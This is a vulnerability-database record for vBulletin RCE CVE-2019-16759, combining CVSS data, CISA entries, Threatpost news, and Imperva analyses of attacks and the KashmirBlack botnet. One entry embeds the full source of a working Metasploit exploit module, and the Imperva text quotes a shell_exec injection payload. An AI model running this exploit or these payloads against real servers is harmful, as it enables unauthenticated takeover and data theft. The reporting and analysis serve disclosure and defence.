"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-24T22:15:00", "title": "Immunity Canvas: VBULLETIN_WIDGET_RCE", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-24T22:15:00", "id": "VBULLETIN_WIDGET_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/vbulletin_widget_rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "vBulletin PHP Module Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-16759", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "vBulletin PHP Module Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": 
"2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-17496", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:41:02", "description": "\nvBulletin 5.x - Remote Command Execution (Metasploit)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-30T00:00:00", "title": "vBulletin 5.x - Remote Command Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-30T00:00:00", "id": "EXPLOITPACK:195EC6198873D3265FF46CC0358D10F2", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\n 'Description' => %q{\n vBulletin 5.x 0day pre-auth RCE exploit.\n This should work on all versions from 5.0.0 till 5.5.4\n },\n 
'Platform' => 'php',\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Reported by: anonymous', # reported by\n 'Original exploit by: anonymous', # original exploit\n 'Metasploit mod by: r00tpgp', # metasploit module\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x22\",\n },\n 'References' =>\n [\n ['CVE', 'CVE-2019-16759'],\n ['EDB', 'NA'],\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\n ],\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [ 'Automatic Targeting', { 'auto' => true } ],\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\n ],\n 'DisclosureDate' => 'Sep 23 2019',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\n ])\n\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\n 'encode_params' => false,\n 'vars_post' => \n {\n 'widgetConfig[code]' => \"echo shell_exec(\\'echo h4x0000r4l1f4 > /tmp/msf.check.out; cat /tmp/msf.check.out\\');exit;\",\n }\n })\n\n if res && res.body && res.body.include?('h4x0000r4l1f4')\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending payload.....\")\n resp = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,'/index.php?routestring=ajax/render/widget_php'),\n 'encode_params' => false,\n 'vars_post' =>\n {\n #'widgetConfig[code]' => \"echo \" + payload.encoded + \"exit;\",\n\t 'widgetConfig[code]' => payload.encoded,\n }\n })\n #unless resp and resp.code == 200\n # fail_with(Failure::Unknown, \"Exploit failed.\")\n #end\n\n #print_good(\"Success!\")\n #print_line(resp.body)\n\n end\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": 
"2020-09-09T22:43:51", "description": "A critical remote code execution (RCE) bug affecting default 5.x versions of vBulletin (CVE-2019-16759) is being actively exploited in the wild, allowing unauthenticated attackers to take control of web hosts.\n\nA zero-day proof-of-concept code was [anonymously published](<https://seclists.org/fulldisclosure/2019/Sep/31>) on Monday, ahead of vBulletin issuing a patch. Also, Tenable vice president of intelligence Gavin Millard said via email that there is now a script to [leverage Shodan](<https://github.com/Frint0/mass-pwn-vbulletin>) and mass identify thousands of vulnerable systems.\n\n## Bug Details\n\nA successful exploit would allow an attacker to take control of a site using vBulletin, a popular platform for powering online forums and communities.\n\nAccording to Sucuri researcher Marc-Alexandre Montpas, the bug is caused by a flaw in vBulletin\u2019s PHP widgets, which are rendered at runtime and used to create dynamic widgets without having to directly access the hosting server.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe researcher found a way to force the site to render arbitrary widgets using the ajax/render/widget_php route,\u201d he explained in [a blog post](<https://blog.sucuri.net/2019/09/zero-day-rce-in-vbulletin-v5-0-0-v5-5-4.html>) this week. 
\u201cSince the evalCode callback does exactly what you think it does, essentially running eval on the code it is fed, this makes it possible to run arbitrary code on the underlying server.\u201d\n\nTenable Research [analysis showed](<https://www.tenable.com/blog/critical-zero-day-pre-authentication-remote-code-execution-exploit-published-for-5-x-versions>) that an unauthenticated attacker can exploit the issue by sending a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands.\n\n\u201cThese commands would be executed with the permissions of the user account that the vBulletin service is utilizing,\u201d said Tenable researcher Ryan Seguin, in the analysis. \u201cDepending on the service user\u2019s permissions, this could allow complete control of a host\u2026.the published exploit code returns its successful execution in a JSON formatted response.\u201d\n\nThe fix is for versions 5.5.2, 5.5.3 and 5.5.4; users on earlier versions of vBulletin 5.x will need to update to one of the currently supported versions in order to apply the patch. The fix has also been applied to the cloud version of the platform.\n\nAdministrators should apply the patch as soon as possible.\n\nMontpas warned, \u201cThis vulnerability is extremely severe. It allows any website visitors to run PHP code and shell commands on the site\u2019s underlying server. As if it wasn\u2019t bad enough, this bug doesn\u2019t require the attacker to have any kind of privilege to conduct a successful attack. vBulletin\u2019s default settings also make the vulnerable endpoint accessible by default.\u201d\n\n## Attacks in the Wild\n\nSucuri and Tenable telemetry has identified a rash of attacks already taking place in the wild, just days after the PoC was dropped on Securelist.\n\n\u201cThe payload attackers are using is very interesting: It essentially modifies the vulnerable snippet by adding a password validation,\u201d Montpas noted. 
\u201cThis is a way for attackers to maintain access to sites they\u2019ve hacked for themselves, as well as lock out other potential hackers from getting in. From this point, the bad actor can use his newly acquired site to do other malicious things in the future.\u201d\n\nTo find out if a site has been compromised, the researcher said to look for \u201cajax/render/widget_php\u201d in the access logs. That\u2019s because some of the parameters used in the attacks can be located on POST requests, which wouldn\u2019t leave any traces in the logs.\n\nMike Bittner, associate director of Digital Security and Operations at The Media Trust, said that it was just a matter of time before bad actors fixed their crosshairs on forums, which are rich storehouses of user information.\n\n\u201cThe argument that many of today\u2019s sites do not collect users\u2019 information betrays a very uninformed notion of how websites work,\u201d he said via email. \u201cMost, if not all, of today\u2019s websites are built using a vendor\u2019s platform. If you\u2019re a small business, you probably don\u2019t have the time or the money to build your own platform. If you\u2019re a medium-sized or large organization, you don\u2019t have the time or money to build a platform with all the bells and whistles users have come to expect. Forums are just one example. Unfortunately, vendors that supply these features too often collect information on users without site owners\u2019 authorization, while failing to equip their products with the needed security and privacy protections, leaving website owners to fend for themselves and shoulder the blame for any data breaches involving their sites. 
In an environment where bad actors are always looking out for vulnerabilities they can exploit or well-intentioned products like vBulletin they can abuse, site owners will need to close the security gaps themselves\u2013ideally by carefully vetting their vendors and ensuring those vendors observe digital policies.\u201d\n", "cvss3": {}, "published": "2019-09-26T17:45:03", "type": "threatpost", "title": "Rash of Exploits Targets Critical vBulletin RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T17:45:03", "id": "THREATPOST:93DDA46851A2B52DAA3C46486A4B35F7", "href": "https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-10T12:10:37", "description": "Hackers have stolen the account details of 250,000 users of Dutch sex-work forum Hookers.nl \u2013 including email addresses of both escorts and customers.\n\nThe website provides a forum for escorts and customers to discuss sex work \u2014 including clients discussing their experiences with sex workers. 
A moderator on the forum said [on Thursday](<https://www.hookers.nl/forum/hookers-hang-out/over-ons/bugs-andere-foutjes/2811760-datalek-hookers-nl>) that a hacker gained access to personal details through a recently disclosed software vulnerability in an external software supplier of the website, vBulletin, which powers the forum.\n\nThe hacker was able to exploit the flaw to access a Hookers.nl user database, which includes the email addresses, usernames, hashed passwords and IP addresses of forum users. In some cases, email addresses and usernames could include users\u2019 full names.\n\n\u201cA data breach has occurred and the email addresses have been stolen from all users,\u201d said the forum moderator. \u201cPlease note the passwords. These email addresses have been offered for sale online by hackers. Offering this information for sale is punishable by law and if possible we will take legal action against this or that. In addition, a report has been made to the Dutch Data Protection Authority.\u201d\n\nA [news outlet](<https://nos.nl/artikel/2305470-e-mailadressen-bezoekers-prostitutieforum-uitgelekt-en-te-koop-aangeboden.html>), the Dutch Broadcast Foundation, which was in contact with the hacker, viewed the database and confirmed its legitimacy. The outlet reported that the hacker is selling the database for just $300. According to the news outlet, the hacker has not yet sold the data \u2013 but expects it will sell.\n\nThe [vBulletin vulnerability](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) in question ([CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>)), which allows remote command-execution, was disclosed last week. Though vBulletin has released patches for the flaw, exploit code was released on Sept. 
23 \u2013 and many websites have not yet updated.\n\nThat has been seen through the active exploit of several websites, including a data breach impacting Comodo (as recently announced last week on [Comodo\u2019s forum](<https://forums.comodo.com/general-announcements/important-security-notice-about-comodo-forums-accounts-t124921.0.html>)).\n\nThe sensitive nature of the content on Hookers.nl could make the data ripe for the blackmail of affected users \u2013 both for clients and for the prostitutes actively using the forum, Chris Morales, head of security analytics at Vectra, told Threatpost.\n\n\u201cvBulletin is used for internet forums of every interest, from cooking, cars and to computers,\u201d he said. \u201cNormally an account used on a bulletin board does not contain a huge amount of information on the user, or at least it shouldn\u2019t. I wouldn\u2019t consider a public forum software compromise to be a high-risk issue. I think the nature of this bulletin board, a focus on sex workers, does change that sensitivity. That is quite exposing considering the conversations and that it reveals who the sex workers are.\u201d\n\nThe incident is reminiscent of a [2015 breach of Ashley Madison](<https://threatpost.com/password-cracking-crew-cracks-11m-ashley-madison-passwords/114625/>), an adultery hook-up website that resulted in hackers making away with names, emails, home addresses, credit card data and sexual fantasy information of all of its customers.\n\n\u201cAction has been taken as quickly as possible,\u201d according to the forum moderator. \u201cvBulletin has released a software patch that we have implemented after testing to address the leak.\u201d\n
", "cvss3": {}, "published": "2019-10-10T20:37:40", "type": "threatpost", "title": "vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2019-10-10T20:37:40", "id": "THREATPOST:4A277DEB5D5A3A6B9256417086928D71", "href": "https://threatpost.com/vbulletin-flaw-dutch-sex-work-forum-breach/149100/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-16T22:18:50", "description": "A security researcher has published proof-of-concept code to outsmart a patch issued last year for a zero-day vulnerability discovered in vBulletin, a popular software for building online community forums.\n\nCalling a patch for the flaw a \u201cfail\u201d and \u201cinadequate in blocking exploitation,\u201d Austin-based security researcher Amir Etemadieh published details and examples of exploit code in three languages\u2013Bash, Python and Ruby\u2013for the patch in a post published [Sunday night](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>).\n\nOn September 23, 2019, an unidentified security researcher released [exploit code](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) for a flaw that allowed for PHP remote code execution in vBulletin 5.0 through 5.4, Etemadieh wrote.\n\nThe zero-day, [CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>), is called a pre-auth RCE bug, which can allow an 
attacker to run malicious code and take over forums without needing to authenticate on the sites that are under attack.\n\n\u201cThis bug (CVE-2019-16759) was labeled as a \u2018bugdoor\u2019 because of its simplicity by a [popular vulnerability broker](<https://twitter.com/cbekrar/status/1176803541047861249?>) and was marked with a [CVSS 3.x score of 9.8](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>) giving it a critical rating,\u201d he said in the post.\n\nA patch was issued two days later, Sept. 25, 2019, that \u201cseemed, at the time, to fix the proof of concept exploit provided by the un-named finder,\u201d Etemadieh said.\n\nIt appears that it didn\u2019t, however, as Etemadieh outlined how it can be bypassed on the three developer platforms in three separate proof-of-concepts.\n\nThe key problem with the patch issued for the zero day is related to how the vBulletin template system is structured and how it uses PHP, he wrote in the post.\n\n\u201cTemplates aren\u2019t actually written in PHP but instead are written in a language that is first processed by the template engine and then is output as a string of PHP code that is later run through an eval() during the \u2018rendering\u2019 process,\u201d according to the post. \u201cTemplates are also not a standalone item but can be nested within other templates, in that one template can have a number of child templates embedded within.\u201d\n\nThe patch is \u201cshort-sighted\u201d because it faces problems when encountering a user-controlled child template, Etemadieh wrote. 
In this case, a parent template will be checked to verify that the routestring does not end with a widget_php route, Etemadieh said.\n\n\u201cHowever we are still prevented from providing a payload within the widgetConfig value because of code within the rendering process, which cleans the widgetConfig value prior to the templates execution,\u201d he wrote in his post.\n\nEtemadieh goes on to show how another template that appears in the patch is \u201ca perfect assistant in bypassing the previous CVE-2019-16759 patch\u201d thanks to two key features: the template\u2019s ability to load a user-controlled child template, and how it loads the child template by taking a value from a separately named value and placing it into a variable named \u201cwidgetConfig.\u201d\n\n\u201cThese two characteristics of the \u2018widget_tabbedcontainer_tab_panel\u2019 template allow us to effectively bypass all filtering previously done to prevent CVE-2019-16759 from being exploited,\u201d he wrote.\n\nIt\u2019s unclear if Etemadieh informed vBulletin before posting the workarounds; however, a [report](<https://www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/>) in ZDNet suggests that he did not. No matter, he did provide a quick fix for his bypass of the patch in his post, showing how to disable PHP widgets within vBulletin forums that \u201cmay break some functionality but will keep you safe from attacks until a patch is released by vBulletin,\u201d he wrote.\n\nTo apply the fix, administrators should:\n\n 1. Go to the vBulletin administrator control panel.\n 2. Click \u201cSettings\u201d in the menu on the left, then \u201cOptions\u201d in the dropdown.\n 3. Choose \u201cGeneral Settings\u201d and then click \u201cEdit Settings\u201d\n 4. 
Look for \u201cDisable PHP, Static HTML, and Ad Module rendering\u201d, Set to \u201cYes\u201d\n 5. Click \u201cSave\u201d\n\nOnline forums are a popular target for hackers because they typically have a wide and diverse user base and store a large amount of personally identifiable information about those users.\n\nIndeed, hackers wasted no time in using Etemadieh\u2019s bypass to try to hack into the forum at the DEF CON security conference, according to a [post on Twitter](<https://twitter.com/thedarktangent/status/1292813958332596224>) by DEF CON and Black Hat founder Jeff Moss. However, administrators quickly applied Etemadieh\u2019s advice to disable PHP to thwart the attack, he tweeted.\n\n\u201cDisable PHP rendering to protect yourself until patched!\u201d Moss advised.\n
", "cvss3": {}, "published": "2020-08-11T12:09:30", "type": "threatpost", "title": "Researcher Publishes Patch Bypass for vBulletin 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-11T12:09:30", "id": "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "href": "https://threatpost.com/researcher-publishes-bypass-for-patch-for-vbulletin-0-day-flaw/158232/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2019-09-26T15:44:30", "description": "Imperva\u2019s Cloud WAF has identified instances of a new 0-day vulnerability being exploited within a matter of hours of the exploit being published.\n\nOn Monday 23rd September 2019, an exploit was published for a vulnerability found within vBulletin (versions 5.0.0 to 5.5.4), allowing malicious attackers to perform authentication-free Remote Code Execution on the origin server. Alongside the exploit, \u201cgoogle dorks\u201d - which allow attackers to find potentially vulnerable instances of the service in the wild - were also published.\n\nThe vulnerability exists where URL parameters are passed to a widget file within the forum software itself. These parameters are then parsed on the server without any security checks - the malicious attacker can then inject commands and is able to remotely execute code on the application server.\n\nThe exploit for this vulnerability enables an attacker to generate a POST request to the vulnerable instance of vBulletin, containing the parameter \u2018widgetConfig\u2019 which is parsed on the server and evaluated without being sanitized. For example: \n \nThe attack pattern triggered mitigation rules on our Cloud WAF, based on known existing attack patterns as well as on data we\u2019ve collected on malicious source IPs. 
This allowed Imperva to observe and block the attack as it occurred, within 24 hours of the vulnerability\u2019s publication. The rules in question matched against known malicious Remote Code Execution patterns present in the body of the request.\n\nA Python-based exploit, which can easily be used by low-skilled attackers, is now publicly available for anyone to exploit this 0-day vulnerability, which has been assigned [CVE-2019-16759](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>).\n\nBelow are some examples of the payloads observed since the exploit's release, along with a brief explanation of the perceived attacker intent.\n\n## Example 1:\n\n**Number of similar observed requests: **7,000+ \n**Explanation: **The attacker is using the shell_exec function to execute shell commands on the server.\n\n## Example 2:\n\n**Number of similar observed requests: **3,000+ \n**Explanation: **The attacker is likely testing the exploit by executing the md5 function on a given string. If the server returns the md5 hash, the exploit has worked.\n\n## Example 3:\n\n**Number of similar observed requests: **70+ \n**Explanation: **The eval function is used to run base64-decoded, obfuscated PHP.\n\n## Example 4:\n\n**Number of similar observed requests: **50+ \n**Explanation: **Attempts to read a remote file, demonstrating that the server can execute attacker-supplied code.\n\n## Example 5:\n\n**Number of similar observed requests: **1 \n**Explanation:** The attacker is using shell_exec to run wget, retrieve a PHP file from a remote location, and write it to the server. In this instance the PHP code is a backdoor, enabling uploads of additional files.\n\n## vBulletin RCE Vulnerability: Timeline of Events\n\nAt the time of writing, Imperva has observed over 10,000 instances of rules triggered by the payload generated by the published exploit.\n\n 1. **23/09/19 - 23:05:** vBulletin 5.x 0day pre-auth RCE exploit published on seclists.org.\n 2. 
**24/09/19 - 08:15:** First malicious requests similar to the payload from the published exploit trigger blocking rules on Imperva Cloud WAF. \nThese initial payloads were not generated directly from the published exploit; however, as \u2018echo shell_exec('\"+cmd+\"');\u2019 is passed in the parameter in the published exploit, shell commands can be executed.\n 3. **25/09/19 - 03:02:** First malicious payloads matching exactly those generated by the published exploit trigger blocking rules on Imperva Cloud WAF.\n 4. **25/09/19 - 05:15:** Mass-Pwn-vBulletin scanner published on Github\n 5. **25/09/19 - 10:17:** vBulletin security patch released on forums.\n 6. **25/09/19 - 13:38:** First malicious requests matching those generated by the Mass-Pwn-vBulletin scanner observed and blocked.\n 7. **25/09/19 - 14:58: Specific rule matching the published exploit added globally to Imperva Cloud WAF.**\n 8. **26/09/19 - 04:50:** Nmap script for CVE-2019-16759 released on Github.\n\nAnother valuable insight provided by the functionality in the Imperva Cloud WAF was the ability to track the volume of malicious requests from IPs of known threat actors, a list which is constantly updated. The Imperva Cloud WAF has unique ways of gathering this data and, in this case, we were able to observe that a number of the requests originated from IPs which had already been listed as malicious in previous activities such as remote file inclusion. 
\n\nThe Security Research Team at Imperva are continuing to monitor this attack as it develops.\n\nThe post [Attackers Are Quick to Exploit vBulletin\u2019s Latest 0-day Remote Code Execution Vulnerability](<https://www.imperva.com/blog/attackers-are-quick-to-exploit-vbulletins-latest-0-day-remote-code-execution-vulnerability/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-09-26T13:43:30", "type": "impervablog", "title": "Attackers Are Quick to Exploit vBulletin\u2019s Latest 0-day Remote Code Execution Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T13:43:30", "id": "IMPERVABLOG:E0E8BEBCCF52907348567BCF57CCF0A8", "href": "https://www.imperva.com/blog/attackers-are-quick-to-exploit-vbulletins-latest-0-day-remote-code-execution-vulnerability/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-23T00:02:03", "description": "## Introduction\n\nThe previous blog - \u201c[CrimeOps of the KashmirBlack Botnet - Part 
I](<https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-i/>)\u201d - described the DevOps behind the botnet. It showed how its well-designed infrastructure makes it easy to expand and add new exploits or payloads without much effort, and explained the evolution and version deployment of the botnet.\n\nThe blog mentioned the delivery process of the botnet\u2019s exploits and payloads, the steps made to secure the C&C, and the infrastructure changes taken to make the botnet more dynamic and scalable, while achieving redundancy, failover and load balancing.\n\nThree questions were raised: What? When? And How? - although only the first two were answered. \n\nThis blog will uncover the bits-and-bytes behind the third question: How? \nWe will explain how the KashmirBlack botnet operates, describe its entities, and dive into the spreading technique.\n\nThe botnet infrastructure is composed of nine types of entities, each of which plays a specific role in the complex botnet operation. All share the same goal, however: to expand the botnet by delivering the KashmirBlack malicious script to victim servers, to carry out its crimes.\n\nWe\u2019ll take a walk into the darker side of the KashmirBlack botnet, and explore the techniques used by the malicious script to stay under the radar, communicate with the C&C, send instructions to other bots in the botnet and track the entire operation. 
Breaking down the botnet spreading technique, we\u2019ll show the different vulnerabilities the botnet\u2019s malicious script exploits and discuss the different types of payload outcomes.\n\nIn the \u201cSummary\u201d section you can find indicators of compromise (IOC), remediation, and the impact on Imperva customers.\n\n### The Botnet Entities\n\nLet\u2019s take a glimpse into the heart of the botnet and all the pieces that make up this complex infrastructure.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-1-KashmirBlack-botnet-flow-diagram-.png>)\n\nFigure 1: KashmirBlack botnet flow diagram\n\n**The C&C** \nThe C&C server is a centralized machine able to send commands and receive telemetries from machines that are part of a botnet. \nThe KashmirBlack C&C, located in Indonesia, has three main roles:\n\n* Supply a Perl script that infects the victim server with the botnet malicious script\n* Receive reports of findings and attack results from bots\n* Supply bots with attack instructions\n\nFigure 2 below shows the login page of the C&C:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-2-CC-login-page-.png>)\n\nFigure 2: C&C login page\n\nWhen checking the **\u2018C&C\u2019** URL in VirusTotal it appears to be a malicious site detected by only one vendor. \n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-3-Virustotal-check-for-the-CC-URL-.png>)\n\nFigure 3: Virustotal check for the C&C URL\n\nWe suspect the server is owned by the attacker since, unlike most sites, there is no main page under the domain name.\n\n**Repository A** \nThe original **\u2018repository A\u2019** is a printer component shopping site that was hacked by the attacker and is now used as a repository to store files. \nThis entity plays a role in the infection by supplying the botnet malicious script - to communicate with the C&C. 
\nAfter the May 2020 infrastructure change, **\u2018repository A\u2019** was extended to seven repositories.\n\nWhen checking the **\u2018repository A\u2019** URL in VirusTotal it appears to be a legitimate site.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-4-\u2018repository-A-shopping-site.png>)\n\nFigure 4: **'repository A'** shopping site\n\nThe files are hidden inside the css path (hxxps://<site\u2019s domain>/css) among other css files used by the innocent web server. The malicious files are zip files camouflaged with a .css extension. All the files uploaded to the repository by the attacker are password-protected to ensure their content can\u2019t be revealed should someone find them.\n\n**Repository A Load Balancer** \nAs the botnet size increased, so too did the load on the repositories, as more bots fetched files from these repositories.\n\nThe addition of a new entity, \u2018repository A load balancer\u2019, allowed scalability. A request to the load balancer returned the address of one of the multiple repositories in \u2018repository A\u2019. To integrate this change into the botnet operation, an additional change in the botnet malicious script was required.\n\n**Repository B** \nThe original **\u2018repository B\u2019** is another allegedly legitimate site, according to VirusTotal. The site is classified as an educational institution and is used by the hacker to store bundles of exploits and payloads.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-5-\u2018repository-B-educational-institution-site-.png>)\n\nFigure 5: **'repository B'** educational institution site\n\nSimilar to \u2018repository A\u2019, the attacker uses a .css extension to hide traces under the /css directory. \nFigure 6 below shows the content of **\u2018repository B\u2019**: exploit and payload files with the prefix inmemory. 
